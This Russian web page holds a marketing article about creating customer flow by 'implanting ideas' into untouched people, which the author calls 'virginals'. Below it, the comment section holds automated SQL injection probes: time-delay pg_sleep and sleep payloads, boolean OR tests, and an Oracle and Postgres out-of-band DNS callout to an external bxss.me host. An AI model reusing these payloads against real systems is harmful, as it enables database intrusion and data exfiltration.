Главная
Блоги
  Войти
Регистрация
 
Главная> Карьера и Успех>Как создать мощный поток клиентов

Как создать мощный поток клиентов


Instagram: @alexandr__zubarev
Как создать мощный поток клиентов

Как создать мощный поток клиентов

Без потребителей нет продаж. Соответственно перед каждым, кто хочет получить мощные продажи, встает вопрос о том, как получить поток клиентов, желательно максимально мощный. Чтобы его создать, необходимо прежде всего четко понять кто такой потребитель. В маркетинге 2.0 потребитель – это нечто естественное, что всегда было и существовало. Вопрос о том, что может быть как-то по-другому даже не ставиться.

Алгоритмы и процессы маркетинга 3.0 говорят нам о том, что изначально есть только человек, потребителя нет, а это существенно меняет дело. Раз нет потребителя, значит, нет и потребности, значит, маркетинг еще не к чему применять. Чтобы начать маркетинг, нужно создать потребность через внедрение в человека идеи. Внедренная в человека идея, которая приходит из идеального мира воздействует на человека и он под ее воздействием становится потребителем. Он хочет это идею реализовать и ему нужны товары и услуги.

Он хочет это идею реализовать и ему нужны товары и услуги

Соответственно нам нужно дать термин для того, чтобы можно было отразить человека, в которого еще не была внедрена идея. Этот термин должен указывать, что человек относительно идеи является чистым, девственным, что идея не проникала в него ни разу, ни на грамм, ни на миллиметр. Этот термин должен указывать на то, что такой человек ни разу не имел дело с идей, не видел и не слышал ее воплощений, не щупал их, не чувствовал идею в себе.

Как запустить маркетинг

В английском языке есть красивое слово – virgin. После долгих рассуждений именно это слово, которое на русский язык как раз и переводится как девственный человек, неопытный человек, легло в основу термина. Так родился термин – виргинал. Под виргиналом в ноомаркетинге подразумевается человек, который ранее ни разу имел дел в том или ином виде с конкретной идеей.

Виргинал – это словно чистый, немятый лист белой бумаги, только что из пачки. К нему можно применять только маркетинг 3.0.

Раз он не имел с ней дел, то он не имеет нужды и потребности, которые олицетворяет данная идея, тем более он не удовлетворял нужду и потребность. По отношению к виргиналу маркетинг 2.0 бессилен, ибо ему не нужны товары либо услуги, соответствующие данной идее. Виргинал – это словно чистый, немятый лист белой бумаги, только что из пачки. К нему можно применять только маркетинг 3.0.

Посредством маркетинга 3.0 с виргиналом можно делать все что угодно, что касается данной идеи. Ее можно в него внедрить, ее можно в нем воплотить. Именно с виргинала начинает свой путь идея, превращая его в потребителя. Только после того, как в человека будет внедрена идея, маркетинг 2.0 начинает работать. В процессе проведения работ по развитию ноомаркетинга, термин виргинал получил развитие.

Как иметь поток клиентов

Было определено, что виргинал может быть абсолютным и относительным. Абсолютный виргинал – это человек, в которого идее вообще не внедрены, ни одна идея в него не внедрена, ни с одной идеей он не взаимодействовал. Хотя это скорее и абстрактный термин, потому как трудно себе представить человека, в которого не внедрены идеи. С другой стороны это очень важный термин, потому что он указывает на абсолютное начало.

Это кстати очень важный термин, который позволяет понять как создать поток клиентов

Относительный виргинал – это человек, в которого не внедрена данная конкретная идея, он с ней ни разу не взаимодействовал. В относительного виргинала могут быть внедрены сотни других идей и относительно них он не виргинал, но если конкретная идея, идея, которая в данный момент имеется в виду в него не внедрена, то относительно этой идеи он виргинал. Это кстати очень важный термин, который позволяет понять как создать поток клиентов.

Хотя термин виргинал и новый, но с виргиналами маркетологи имеют дело каждый день, причем давно, с тех пор, как маркетологи появились. Например, именно виргинал вообще не реагирует на рекламу, на любую рекламу, даже самую качественную. Это в принципе нормальное для него явление. Как виргинал может реагировать на рекламу, если в него не внедрена идея?

Идея как основа успеха

Реакция есть только тогда, когда через рекламу активизируется конкретная идея, внедренная в человека. Если идея не внедрена, то воздействовать не на что. На рекламу может реагировать либо протопотребитель, либо уже конкретно потребитель. Других вариантов не дано. Соответственно, если Ваша реклама не достигает цели, то надо изучить, а внедрена ли идея, которую Вы хотите донести через рекламу в человека.

Если не внедрена, то ее надо внедрить, либо выявить ту идею, которая уже внедрена и на нее воздействовать. В любом другом случае деньги, потраченные на рекламу, будут потрачены зря, ибо виргинал на рекламу не ведется. Очевидно, что если не знаешь как получить поток клиентов, то не будешь знать и как делать качественную рекламу. Без качественной рекламы на рынке делать нечего.

Без качественной рекламы на рынке делать нечего

Еще один пример – товары новинки. Они продаются плохо или вообще не продаются только потому, что идея, которая вызывает потребность в этих товарах, еще не внедрена в людей. Соответственно, люди относительно данной идеи и относительно данного товара – виргиналы. Они не могут заинтересоваться товаром до тех пор, пока их не будет принуждать к такому интересу идея.

Мощный поток клиентов

Соответственно, прежде чем начать продавать новый товар, нужно внедрить идею, которая соответствует товару, а уже потом предлагать товар. Другой путь будет ошибочным. Конечно, можно в процессе предложения товара внедрить идею, которую он содержит и сделать так, чтобы она интегрировалась с еще одной идеей для того, чтобы образовать третью идею, под которую и станет нужным товар.

Однако это очень дорогой способ и не всегда надежный. Если нужно продать 1 миллион экземпляров товара, нужно посредством товара вступить во взаимодействие с 1 миллионом потенциальных потребителей. В любом случае, пока тем или иным способ идея не внедриться в человека, товар, который она олицетворяет, не может быть продан, потому как человек без идеи - это просто человек, а не потребитель.

Он представляет собой то место, откуда в итоге можно получить поток клиентов

Виргиналов много и все они имеют общий признак – в них не внедрена конкретная идея. По этому общему признаку их можно группировать. Другими словами, совокупность виргиналов можно как-то обозначить. Будем называть совокупность виргиналов, либо территорию, где они проживают - виргиналиум. Он представляет собой то место, откуда в итоге можно получить поток клиентов.

Рынок как источник клиентов

В связи с тем, что рынок – это совокупность потребителей, т.е. людей в которых уже внедрена и воплощена идея, получается, что виргиналиум – это то, из чего создают рынок. На виргиналиум воздействуют идеей и получают из него рынок. Изначально везде был только виргиналиум, который в последующем превратили в рынок. Многие виргиналиумы уже превращены в рынки, но еще остались не превращенные.

В будущем количество виргиналиумов будет только расти, потому что количество новых идей постоянно растет, а значит снова и снова люди относительно каких-то идей становятся виргиналами. В заключение нужно отметить, что термин виргинал не несет в себе ничего плохого, не несет никакого негативного смысла. Некоторые могут найти в этом слове ассоциативную связь со словом маргинал.

Многие начинают бизнес думая, что вокруг много клиентов и в итоге прогорают

Делать этого не стоит, потому что виргинал - это просто слово для отображения того факта, что в человека не внедрена какая-то идея. Как уже быо сказано это очень важный термин, который позволяет понять как получить поток клиентов. Многие начинают бизнес думая, что вокруг много клиентов и в итоге прогорают, потому как в итоге оказываются, что вокруг сплошные виргиналы, которых еще надо превратить в клиентов.

Основа эффективного маркетинга

Если в человека не внедрена идея, это не значит что он плохой или хороший. Он как был просто человеком без всякой оценки и ярлыка, так им и остается. Но маркетолог в своих планах маркетинга рассматривает такого человека как виргинала. Такой подход оправдан, потому как приносит поток клиентов, который можно наращивать до бесконечности.

После того, как идея внедряется, она создает у человека нужду

Таким образом, термин виргинал используется исключительно для того, чтобы показать эволюцию человека с точки зрения маркетинга после того, как в него внедряется идея.До того, как в человека будет внедрена конкретная идея, он виргинал. После того, как идея внедряется, она создает у человека нужду. Человек в состоянии нужды – это протопотребитель.

Когда нужда у человека удовлетворяется, он становится уже потребителем, который стремиться приобрести товар, который соответствует идее в него внедренной. Чтобы научится внедрить идеи нужно читать статьи по маркетингу, а если их недостаточно, целесообразно получить консультации по маркетингу, что в итоге принесет вам мощный поток клиентов.

Автор статьи: Павел Бернович


Instagram: @alexandr__zubarev



Как создать мощный поток клиентов
добавлено : 19.09.2017
обращений к странице: 22665
автор: subscribe.ru
загрузка...
Ваше мнение о статье
Ваше имяЕmail 
Сообщение

комментарий: 21.01.2020 7:35:14

1acuNMHrXANm9A читать

аноним

комментарий: 21.01.2020 7:35:12

1acuSzBlBVXgtE читать

аноним

комментарий: 21.01.2020 1:09:43

760' читать

аноним

комментарий: 21.01.2020 1:09:19

%df%20%e4%f3%ec%e0%fe%20%f7%f2%ee...'copy (select '') to program 'nslookup dns.sqli.\013405.5398-4166.5398.87e2b.\1.bxss.me читать

аноним

комментарий: 21.01.2020 1:09:14

'||UTL_INADDR.get_host_address('dns.'||'sqli.013405.5398-4165.5398.87e2b.1.bxss'||'.me')||' читать

аноним

комментарий: 21.01.2020 1:09:08

MjFunkLn'));select pg_sleep(14.202); -- читать

аноним

комментарий: 21.01.2020 1:09:06

8ppaL3ua');select pg_sleep(14.202); -- читать

аноним

комментарий: 21.01.2020 1:09:03

tGQ2oqpz'select pg_sleep(9.468); -- читать

аноним

комментарий: 21.01.2020 1:08:51

(select(0)from(select(sleep(14.202)))v)/*'+(select(0)from(select(sleep(14.202)))v)+'"+(select(0)from(select(sleep(14.202)))v)+"*/ читать

аноним

комментарий: 21.01.2020 1:08:41

-1" OR 3+970-970-1=0+0+0+1 -- читать

аноним



PSYLIVE - Психология жизни 2001 — 2017 © Все права защищены.
Воспроизведение, распространение в интернете и иное использование информации опубликованной в сети PSYLIVE допускается только с указанием гиперссылки (hyperlink) на PSYLIVE.RU.
Использование материалов в не сетевых СМИ (бумажные издания, радио, тв), только по письменному разрешению редакции.
Связь с редакцией | Реклама на проекте | Программирование сайта | RSS экспорт
ONLINE: Техническая поддержка и реклама: ICQ 363302 Техническая поддержка 363302 , SKYPE: exteramedia, email: psyliveru@yandex.ru, VK: psylive_ru .
Рейтинг@Mail.ru Яндекс.Метрика